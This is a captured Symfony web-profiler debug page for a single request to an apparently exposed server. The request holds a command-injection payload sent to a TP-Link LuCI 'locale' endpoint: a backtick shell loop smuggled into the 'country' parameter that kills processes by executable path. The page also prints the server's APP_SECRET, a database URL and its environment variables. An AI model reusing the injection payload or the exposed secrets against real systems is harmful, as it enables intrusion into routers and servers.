http://54.197.129.30/cgi-bin/luci/;stok=/locale?country=id%3E%60for%20pid%20in%20%2Fproc%2F%5B0-9%5D%2A%2F%3B%20do%20pid%3D%24%7Bpid%25%2F%7D%3B%20pid%3D%24%7Bpid%23%23%2A%2F%7D%3B%20exe_path%3D%24%28ls%20-l%20%2Fproc%2F%24pid%2Fexe%202%3E%2Fdev%2Fnull%20%7C%20awk%20%27%7Bprint%20%24NF%7D%27%29%3B%20if%20%5B%5B%20%24exe_path%20%3D%3D%20%2A%2F%20%5D%5D%3B%20then%20kill%20-9%20%24pid%3B%20fi%3B%20done%3B%60&form=country&operation=write

Method
GET
HTTP Status
302
IP
185.224.128.83
Profiled on
Token
ba6f43

n/a

Request

GET Parameters

Key Value
country 
"id>`for pid in /proc/[0-9]*/; do pid=${pid%/}; pid=${pid##*/}; exe_path=$(ls -l /proc/$pid/exe 2>/dev/null | awk '{print $NF}'); if [[ $exe_path == */ ]]; then kill -9 $pid; fi; done;`"
form 
"country"
operation 
"write"

POST Parameters

No POST parameters

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_stopwatch_token 
"c9a055"

Request Headers

Header Value
host 
"54.197.129.30:80"
user-agent 
"Go-http-client/1.1"
x-php-ob-level 
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control 
"no-cache, private"
content-type 
"text/html; charset=utf-8"
date 
"Sun, 22 Sep 2024 10:47:21 GMT"
location 
"http://www.54.197.129.30/cgi-bin/luci/;stok=/locale?country=id%3E%60for%20pid%20in%20%2Fproc%2F%5B0-9%5D%2A%2F%3B%20do%20pid%3D%24%7Bpid%25%2F%7D%3B%20pid%3D%24%7Bpid%23%23%2A%2F%7D%3B%20exe_path%3D%24%28ls%20-l%20%2Fproc%2F%24pid%2Fexe%202%3E%2Fdev%2Fnull%20%7C%20awk%20%27%7Bprint%20%24NF%7D%27%29%3B%20if%20%5B%5B%20%24exe_path%20%3D%3D%20%2A%2F%20%5D%5D%3B%20then%20kill%20-9%20%24pid%3B%20fi%3B%20done%3B%60&form=country&operation=write"
x-debug-token 
"ba6f43"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_SECRET 
"0468dc9487509ad162025c82176e60a9"
CORS_ALLOW_ORIGIN 
"^https?://(localhost|127\.0\.0\.1)(:[0-9]+)?$"
DATABASE_URL 
"postgresql://app:!ChangeMe!@127.0.0.1:5432/db_name?serverVersion=16&charset=utf8"
EWZ_RECAPTCHA_SECRET 
""
EWZ_RECAPTCHA_SITE_KEY 
""
GOOGLE_RECAPTCHA_SECRET 
""
GOOGLE_RECAPTCHA_SITE_KEY 
""

Defined as regular env variables

Key Value
APP_DEBUG 
"1"
APP_ENV 
"test"
CONTENT_LENGTH 
""
CONTENT_TYPE 
""
DOCUMENT_ROOT 
"/var/www/campussuite/public"
DOCUMENT_URI 
"/index.php"
FCGI_ROLE 
"RESPONDER"
GATEWAY_INTERFACE 
"CGI/1.1"
HOME 
"/usr/share/httpd"
HTTP_HOST 
"54.197.129.30:80"
HTTP_USER_AGENT 
"Go-http-client/1.1"
PATH 
"/usr/local/nvm/versions/node/v4.2.6/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHP_SELF 
"/index.php"
QUERY_STRING 
"form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60"
REDIRECT_STATUS 
"200"
REMOTE_ADDR 
"185.224.128.83"
REMOTE_PORT 
"37136"
REQUEST_METHOD 
"GET"
REQUEST_SCHEME 
"http"
REQUEST_TIME 
1727002041
REQUEST_TIME_FLOAT 
1727002041.8523
REQUEST_URI 
"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60"
SCRIPT_FILENAME 
"/var/www/campussuite/public/index.php"
SCRIPT_NAME 
"/index.php"
SERVER_ADDR 
"10.1.51.67"
SERVER_NAME 
"_"
SERVER_PORT 
"80"
SERVER_PROTOCOL 
"HTTP/1.1"
SERVER_SOFTWARE 
"nginx/1.22.1"
SYMFONY_DOTENV_VARS 
"DATABASE_URL,GOOGLE_RECAPTCHA_SITE_KEY,GOOGLE_RECAPTCHA_SECRET,EWZ_RECAPTCHA_SITE_KEY,EWZ_RECAPTCHA_SECRET,CORS_ALLOW_ORIGIN,APP_SECRET"
USER 
"apache"